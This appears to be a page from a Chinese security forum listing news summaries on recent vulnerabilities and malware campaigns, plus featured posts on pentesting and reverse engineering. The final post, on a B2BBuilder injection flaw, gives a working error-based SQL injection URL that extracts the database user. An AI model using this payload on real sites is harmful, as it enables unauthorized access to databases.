江森自控多款关键产品曝出严重漏洞,可致远程SQL注入攻击

一份紧急安全通告指出,江森自控(Johnson Controls)多款工业控制系统(ICS)产品中存在一个严重的SQL注入漏洞。该漏洞编号为CVE-2025-26385,其在CVSS v3评分体系中获得了满分10.0分的最高严重性评级,表明其对受影响基础设施构成最高级别的风险。此漏洞源于对命令注入中使用的特殊元素处理不当,使得远程攻击者无需身份 ...

2026-02-02 09:26:12 0 89

危险木马“Arsink”间谍软件已渗透到143个国家,埃及和印度尼西亚等国家已经是正在被攻击的重灾区

全球安全公司Zimperium表示,他们发现了Arsink,一个冒充50多个知名品牌的危险安卓木马,包括YouTube和Instagram。该恶意程序已导致143个国家超过45,000人受害,赋予黑客完全远程控制权,包括录音、阅读短信和清除设备数据。它是通过伪装成 YouTube、Instagram和TikTok 等互联网平台的“Arsink”间谍软件。还有更多的国家 ...

2026-02-01 14:05:55 0 141

杀毒软件 eScan 更新服务器遭入侵,它遭受到了1次高危供应链网络攻击

eScan表示,受影响的基础设施已被隔离和重建,认证证书已被轮换,并且已向受影响的客户提供补救措施。攻击者利用该渠道向部分客户推送了包含恶意代码的“安全更新”。安全公司Morphisec单独发布了一份技术报告,分析了在客户终端上观察到的恶意活动,并将其与同期eScan更新基础设施提供的更新相关联。Morphisec表示,它在20 ...

2026-01-30 22:43:13 0 254

Hugging Face 被滥用,传播了数千种安卓恶意软件变种

一种新的 Android 恶意软件活动正在利用 Hugging Face 平台作为存储库,其中包含数千种 APK 有效载荷的变体,这些有效载荷会收集常用金融和支付服务的凭据。Hugging Face 是一个流行的平台,用于托管和分发人工智能 (AI)、自然语言处理 (NLP) 和机器学习 (ML) 模型、数据集和应用程序。它被认为是一个值得信赖的平台,不太 ...

2026-01-30 10:50:04 1 267

微软365 Outlook加载项被恶意利用,可在不留痕迹的情况下窃取敏感电子邮件数据

微软 365 生态系统中存在一个重大的架构盲点,使得威胁行为者能够在不留下任何取证痕迹的情况下窃取敏感的电子邮件数据。这种攻击技术被称为“Exfil Out&Look”,它利用 Outlook 加载项框架来隐蔽地拦截对外通信。与依赖软件漏洞的传统攻击方法不同,该技术滥用 Outlook Web Access (OWA) 中的合法功能来绕过统一审计日志, ...

2026-01-30 09:34:18 1 306

升级升级升级!WinRAR的路径遍历漏洞持续遭到黑客利用 用户应确保使用最新版

网络安全公司 ESET 在 2025 年 8 月报告知名压缩管理器 WinRAR 存在路径遍历漏洞,借助该漏洞黑客可以初始化访问并投放各种恶意负载,该漏洞编号 CVE-2025-8088。得益于 ESET 负责任地提前通报,WinRAR 已经在 2025 年 7 月 30 日发布的 v7.13 版中修复这个漏洞,所以用户如果使用的是 v7.13 及后续版本则不受漏洞影响。然 ...

2026-01-30 08:56:00 2 282

热门活动

T00ls专家

zcgonvh

荣誉会员

文章27篇,精华12篇

1

Twi1ight

潜水会员

文章41篇,精华11篇

2

Rices

潜水会员

文章154篇,精华5篇

3

Bypass

荣誉会员

文章26篇,精华5篇

4

Hmily吾爱破解论坛创始人,著名逆向破解专家

潜水会员

文章18篇,精华4篇

5

ph12h0n

潜水会员

文章40篇,精华4篇

6

lyxhh

潜水会员

文章85篇,精华4篇

7

panda

荣誉会员

文章43篇,精华3篇

8

backlion

注册会员

文章31篇,精华3篇

9

tryblog

版主

文章31篇,精华3篇

10

最新精华

渗透测试利用影子认证帧在标准CAN上实现防重放的技术方案

一个几乎百搭、不改架构、低成本就能落地的整车防重放方案,不是 ...

2025-09-05 18:02:54 7 262

渗透测试浏览器劫持-另类篇

### 前言最近遇到一个项目,在提取浏览器信息时要么提取后乱码要 ...

2025-08-22 11:20:36 18 794

渗透测试分享一次JS自动化加解密过Sign实战经验

本次实战中使用到了jsrpc+autoDecoder+v_jstools实现了JS无感自 ...

2025-07-28 07:47:08 28 1197

逆向破解WinOS银狐远控多重后门浅析

# 前言我在t00ls发布了获取到的WinOS源码第二天,大佬@WBGlIl就 ...

2025-06-27 22:58:11 20 651

逆向破解白加黑dll劫持维权

权限维持及免杀现在越来越难了 有时候可以结合目标环境做一些dll ...

2025-05-12 15:32:11 12 509

[我爱t00ls] B2BBuilder 注入漏洞

最近工作好忙,这不有时间了,看看php代码,不能生锈呢.{:6_440:} 直接上利用方式,大家一看就懂.[code="php"]http://localhost/b2b/aboutus.php?type=12345\' aNd (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (user())),1,62)))a from information_schema.tables group by a)b) and \'z\'=\'z[/code]

Top ↑